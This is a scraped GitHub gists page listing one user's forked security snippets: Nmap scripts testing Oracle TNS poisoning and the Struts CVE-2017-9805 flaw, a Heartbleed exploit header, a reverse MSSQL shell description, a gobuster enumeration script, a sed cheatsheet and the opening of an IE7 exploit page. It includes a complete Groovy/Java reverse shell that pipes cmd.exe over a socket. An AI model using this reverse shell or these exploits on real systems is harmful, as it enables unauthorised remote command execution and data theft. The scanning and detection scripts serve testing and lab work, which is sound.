Skip to content

Instantly share code, notes, and snippets.

Yuhisern Navaratnam yuhisern7

  • Malaysia
Block or report user

Report or block yuhisern7

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@yuhisern7
yuhisern7 / oracle-tns-poison.nse
Created Sep 6, 2019 — forked from JukArkadiy/oracle-tns-poison.nse
Nmap script to test Oracle DB for "TNS poison vulnerability"
View oracle-tns-poison.nse
local bin = require "bin"
local io = require "io"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
description = [[
Simple module to test Oracle DB server for TNS Poison vulnerability.
Module sends to server a packet with command to register new TNS Listener and check response
@yuhisern7
yuhisern7 / http-vuln-cve2017-9805.nse
Created Aug 30, 2019 — forked from r00tpgp/http-vuln-cve2017-9805.nse
Nmap NSE Script Detects whether the specified URL is vulnerable to the Apache Struts REST Plugin XStream Remote Code Execution Vulnerability (CVE-2017-9805)
View http-vuln-cve2017-9805.nse
description = [[
Detects whether the specified URL is vulnerable to the Apache Struts REST Plugin XStream
Remote Code Execution Vulnerability (CVE-2017-9805).
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
@yuhisern7
yuhisern7 / revsh.groovy
Created Aug 29, 2019 — forked from frohoff/revsh.groovy
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@yuhisern7
yuhisern7 / mandros.py
Created Jul 22, 2019 — forked from xassiz/mandros.py
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@yuhisern7
yuhisern7 / heartbleed.py
Created Jul 5, 2019 — forked from eelsivart/heartbleed.py
Heartbleed (CVE-2014-0160) Test & Exploit Python Script
View heartbleed.py
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
@yuhisern7
yuhisern7 / sed cheatsheet
Created Jan 15, 2019 — forked from shikhir-arora/sed cheatsheet
Sed Cheatsheet
View sed cheatsheet
FILE SPACING:
# double space a file
sed G
# double space a file which already has blank lines in it. Output file
# should contain no more than one blank line between lines of text.
sed '/^$/d;G'
@yuhisern7
yuhisern7 / supergobuster.sh
Created Sep 9, 2018 — forked from lokori/supergobuster.sh
gobuster enumerator for hack-the-box machines. This generates huge amount of useless requests..
View supergobuster.sh
#!/bin/bash
set -eu
URL=$1
echo "super go bustering for super brute: $URL"
gobuster -u $URL -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/tomcat.txt
gobuster -u $URL -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/nginx.txt
gobuster -u $URL -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/apache.txt
@yuhisern7
yuhisern7 / exploit.html
Created Aug 27, 2018 — forked from 0x09AL/exploit.html
Internet Explorer 7 RSP Exploit for blogpost
View exploit.html
<!DOCTYPE html>
<html>
<head>
<title> Exploit for IE 7 </title>
<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
</head>
<body>
<script type="text/javascript">
You can’t perform that action at this time.